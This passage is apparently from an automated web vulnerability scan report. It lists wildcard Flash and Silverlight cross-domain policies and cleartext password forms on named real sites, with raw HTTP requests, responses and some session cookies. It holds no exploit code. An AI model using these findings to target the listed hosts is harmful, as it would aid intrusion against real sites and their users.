ETag: "76a2eb098d44109bdef2ab5edf582864:1261669901"
Last-Modified: Tue, 14 Oct 2008 20:09:16 GMT
Accept-Ranges: bytes
Content-Length: 77
Content-Type: application/xml
Date: Sat, 16 Apr 2011 17:02:40 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
5.3. http://pictures.dealer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pictures.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: pictures.dealer.com
Proxy-Connection: keep-alive
Referer: http://theautomaster.com/v8/widgets/generic/image/simple-slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "60d031d9d008574354df1367044279d0:1287596521"
Last-Modified: Wed, 12 May 2010 23:31:20 GMT
Accept-Ranges: bytes
Content-Length: 102
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Sat, 30 Apr 2011 17:02:26 GMT
Date: Sat, 16 Apr 2011 17:02:26 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.4. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close
Server: 33XG3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...
5.5. http://static.dealer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: static.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/v8/widgets/generic/image/simple-slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "6884e23ae3878559e2462c52da253db7:1281542303"
Last-Modified: Wed, 11 Aug 2010 14:54:07 GMT
Accept-Ranges: bytes
Content-Length: 251
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Sat, 30 Apr 2011 17:02:40 GMT
Date: Sat, 16 Apr 2011 17:02:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...
5.6. http://videos.dealer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://videos.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: videos.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/apps/video/player/ddcVideoPlayer_np.swf?ver=1.9.7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.3.10.1303002182

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "1612f281e8f7faf52d90c924e443e0bf:1211468597"
Last-Modified: Thu, 22 May 2008 15:03:17 GMT
Accept-Ranges: bytes
Content-Length: 103
Content-Type: application/xml
Date: Sun, 17 Apr 2011 01:02:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
5.7. http://videos2.dealer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://videos2.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: videos2.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/apps/video/player/ddcVideoPlayer_np.swf?ver=1.9.7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.3.10.1303002182

Response

HTTP/1.0 200 OK
x-amz-id-2: 6ibBp3OXutDZVObQcSErAxRd8VNdN2Ms7eHYQPymDw8NsMfUM2oJI1HayTfJ50Kj
x-amz-request-id: FEAE1E500B76B0B5
Date: Fri, 15 Apr 2011 00:12:58 GMT
x-amz-meta-bucketexplorer-md5: 3c308d6f3e4fe1b315814c0459693aee
x-amz-meta-bucketexplorer-sha1: 093cabd2351702b7ff3490b68d3894b0c2a8dd63
x-amz-meta-md5-hash: 3c308d6f3e4fe1b315814c0459693aee
Last-Modified: Wed, 13 May 2009 02:27:51 GMT
ETag: "3c308d6f3e4fe1b315814c0459693aee"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 117
Server: AmazonS3
Age: 9618
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: a0418eade1661571d0b98ad587d10cb7c43dde15dd7400f55e62bf935c90d8ee90b958a46d00a123
Via: 1.0 35b60fc94656c4665da42ef6273cad71.cloudfront.net:11180 (CloudFront), 1.0 ae2f2d029ed3124a84cfa9aa7ac4668b.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
5.8. http://mt0.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mt0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt0.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Thu, 29 Apr 2010 17:44:34 GMT
Date: Sun, 17 Apr 2011 01:19:13 GMT
Expires: Sun, 17 Apr 2011 01:19:13 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
<allow-access-from domain="*.corp.google.com"/>
<allow-access-from domain="*.borg.google.com"/>
...[SNIP]...
6. Silverlight cross-domain policy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 335
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...
7. Cleartext submission of password  previous  next
There are 70 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

7.1. http://community.martindale.com/groups/groupdirectory.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.martindale.com
Path:   /groups/groupdirectory.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /groups/groupdirectory.aspx HTTP/1.1
Host: community.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:57:23 GMT
Server: community.martindale.com 999 10.172.89.167:26020
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Telligent-Evolution: 5.0.40623.6204
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:23 GMT; expires=Sun, 15-Apr-2012 13:57:23 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:23 GMT; expires=Sun, 15-Apr-2012 13:57:23 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fbe2iivl3051vw55pumhla45; path=/; HttpOnly
Set-Cookie: CSExtendedAnalytics=6a585129-8677-4e91-b2ab-7ec120f5aac9; expires=Tue, 16-Oct-2012 13:57:23 GMT; path=/
Set-Cookie: CSExtendedAnalyticsSession=2828cdbb-ee29-4987-90c0-f64dc6fcf365; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 105287
Connection: close
X-RE-Ref: 1 -1984691478
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<div align="center">
<form name="aspnetForm" method="post" action="/groups/groupdirectory.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl00$fragment_37ecd1f6_d000_453d_b75e_a35fead33cbf$ctl00$txtFlyOutPassword" type="password" maxlength="20" id="ctl00_fragment_37ecd1f6_d000_453d_b75e_a35fead33cbf_ctl00_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.2. http://community.martindale.com/upgrade-your-connected-account.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.martindale.com
Path:   /upgrade-your-connected-account.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /upgrade-your-connected-account.aspx HTTP/1.1
Host: community.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 16 Apr 2011 13:57:24 GMT
Server: community.martindale.com 999 138.12.88.54:26020
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Telligent-Evolution: 5.0.40623.6204
Location: /SignIn.aspx?ReturnUrl=%2fthemes%2fmhc%2fpages%2fUpgradeAccount.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:24 GMT; expires=Sun, 15-Apr-2012 13:57:24 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 16 Apr 2011 09:57:24 GMT; expires=Sun, 15-Apr-2012 13:57:24 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5wefmq55kxgfut55o4gat3ul; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 62170
Connection: close
X-RE-Ref: 1 -1983794703
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSignIn.aspx%3fReturnUrl%3d%252fthemes%252fmhc%252fpages%252fUpgradeAccount.aspx">here</a>.</h2>
</body></html>

...[SNIP]...
<div align="center">
<form name="aspnetForm" method="post" action="/upgrade-your-connected-account.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl00$fragment_d98c0d41_7b1e_4073_b418_3403d8759dfa$ctl00$txtFlyOutPassword" type="password" maxlength="20" id="ctl00_fragment_d98c0d41_7b1e_4073_b418_3403d8759dfa_ctl00_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...
7.3. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tbe.taleo.net
Path:   /NA8/ats/careers/jobSearch.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /NA8/ats/careers/jobSearch.jsp?org=QUALYS&cws=7 HTTP/1.1
Host: tbe.taleo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:04:30 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm; Path=/NA8/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12210


<html><head><title>Career Opportunities</title></head><body>
<STYLE type="text/css">
body {
padding: 15px;
font-family: Verdana;
font-siz
...[SNIP]...
<tr>
<form action='http://tbe.taleo.net/NA8/ats/careers/applicantView.jsp;jsessionid=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm?org=QUALYS&cws=7' method='post' name='loginForm'>
<input type='hidden' name='org' value='QUALYS'>
...[SNIP]...
<td nowrap colspan=4><input tabIndex='22' type='password' name='cwsPassword' maxlength=50 size=40></td>
...[SNIP]...
7.4. http://www.100zakladok.ru/save/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100zakladok.ru
Path:   /save/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /save/ HTTP/1.1
Host: www.100zakladok.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:34 GMT
Server: Apache
Last-Modified: Sat, 12 Feb 2011 18:33:42 GMT
Connection: close
Content-Type: text/html; charset=windows-1251
Content-Length: 8554

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>100zakladok.ru - .......... ...... ... ........ ..... ........-........</tit
...[SNIP]...
<br>
<form action="./" method="post">
<table class="s80">
...[SNIP]...
<td><input type="password" name="lp" size="20" maxlength="32" class="inp"> <a href="/forgot/" class="t">
...[SNIP]...
7.5. http://www.2linkme.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.2linkme.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.2linkme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44109
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAATQQBDC=IJOIFKMAMAABEBNNNAPNFBNC; path=/
Date: Sun, 17 Apr 2011 14:20:09 GMT
Connection: close


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="it" >
<head>
<meta name="verify-v1" content="yNECeZAlEb/41nI6IfpxFB/WLGtIjqwE
...[SNIP]...
<div style="margin-top:0px; top:0px; position: absolute; width:100%;">
   <form action="?" method="post" name="Login" >
       <div style="border-bottom:1px; border-bottom-color:#FF0000; border-bottom-style:solid; background-color:#FF0000; background-image:url(images/sfondo_Search_Rosso.gif); height:35px; margin:0px; paddi
...[SNIP]...
<input class="in" type="text" name="email" value="" size="16" style="font-weight:bold; font-family:Verdana;" title="email" onChange="document.Login.user.value=this.value;" />&nbsp;
               password:&nbsp;<input class="in" type="password" name="password" value="" size="16" style="font-weight:bold; font-family:Verdana;" title="Password" />&nbsp;
               <input type="submit" value="Accedi" class="search" style="font-size:12px;" />
...[SNIP]...
7.6. http://www.adifni.com/account/bookmark/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adifni.com
Path:   /account/bookmark/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account/bookmark/ HTTP/1.1
Host: www.adifni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ccqnqbgksfaosa21l0runj1bl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" >

...[SNIP]...
<table width="100%">

<form method="POST"><input type="hidden" name="PHPSESSID" value="ccqnqbgksfaosa21l0runj1bl0" />
...[SNIP]...
<td>

<input type="Password" name="login_user_pass" value="" maxlength="18" style="width:100%;">

</td>
...[SNIP]...
7.7. http://www.adifni.com/account/bookmark/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adifni.com
Path:   /account/bookmark/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account/bookmark/ HTTP/1.1
Host: www.adifni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=ccqnqbgksfaosa21l0runj1bl0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" >

...[SNIP]...
<table width="100%">

<form method="POST"><input type="hidden" name="PHPSESSID" value="ccqnqbgksfaosa21l0runj1bl0" />
...[SNIP]...
<td>

<input type="Password" name="login_user_pass" value="" maxlength="18" style="width:100%;">

</td>
...[SNIP]...
7.8. http://www.arto.com/section/user/login/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arto.com
Path:   /section/user/login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /section/user/login/?destination=http%3a%2f%2fwww.arto.com%2fsection%2flinkshare%2fdefault.aspx HTTP/1.1
Host: www.arto.com
Proxy-Connection: keep-alive
Referer: http://burp/show/53
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0cj2vqxnas50saq4rab4bmqt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 14:59:22 GMT
Content-Length: 39957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<body id="BodyTag" class=" defaultPage ">
<form method="post" action="?destination=http%3a%2f%2fwww.arto.com%2fsection%2flinkshare%2fdefault.aspx" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
</span>
           <input name="ctl00$ctl00$Main$SiteTopBar$ArtoLoginBox$PasswordTextbox" type="password" maxlength="20" id="Main_SiteTopBar_ArtoLoginBox_PasswordTextbox" tabindex="2" class="navInput" size="13" />&nbsp;<span>
...[SNIP]...
7.9. http://www.auditmypc.com/firewall-test.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.auditmypc.com
Path:   /firewall-test.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /firewall-test.asp HTTP/1.1
Host: www.auditmypc.com
Proxy-Connection: keep-alive
Referer: http://www.auditmypc.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:58:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b360041c54d2cdb95c517eb06e24f89e; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 23686

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Firewall Test - Free Internet Security Testing</title>
<meta name="Author" content="AuditMyPC.com" />
<meta name="K
...[SNIP]...
</p>
       <form action="/firewall-test.asp" method="post" id="frmLogin">
           <table>
...[SNIP]...
<td><input type="password" name="txtLPassword" id="txtLPassword" class="textbox validate['required']" size="16" maxlength="255" value="" /></td>
...[SNIP]...
7.10. http://www.bookmark.it/bookmark.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bookmark.it
Path:   /bookmark.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bookmark.php HTTP/1.1
Host: www.bookmark.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 15:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=15308d1c397501336fd8be9c10c798d7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
<td width="39%" height="80" align="right"> <FORM name=f method=post action="http://www.bookmark.it/accesso.php">
<LABEL for=username>
...[SNIP]...
</LABEL>
<INPUT class=text
type=password size=8 name=pass>
<INPUT type=submit value=Entra name=login class=bottone>
...[SNIP]...
7.11. http://www.bookmark.it/bookmark.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bookmark.it
Path:   /bookmark.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bookmark.php HTTP/1.1
Host: www.bookmark.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 15:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=15308d1c397501336fd8be9c10c798d7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Set-Cookie: bookmar=deleted; expires=Sat, 17-Apr-2010 15:19:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 25746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
<BR> <FORM name=f method=post action="http://www.bookmark.it/accesso.php">
<LABEL for=username>
...[SNIP]...
</LABEL>
<INPUT class=text
type=password size=8 name=pass><BR>
...[SNIP]...
7.12. http://www.bookmerken.de/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bookmerken.de
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.bookmerken.de
Accept: */*
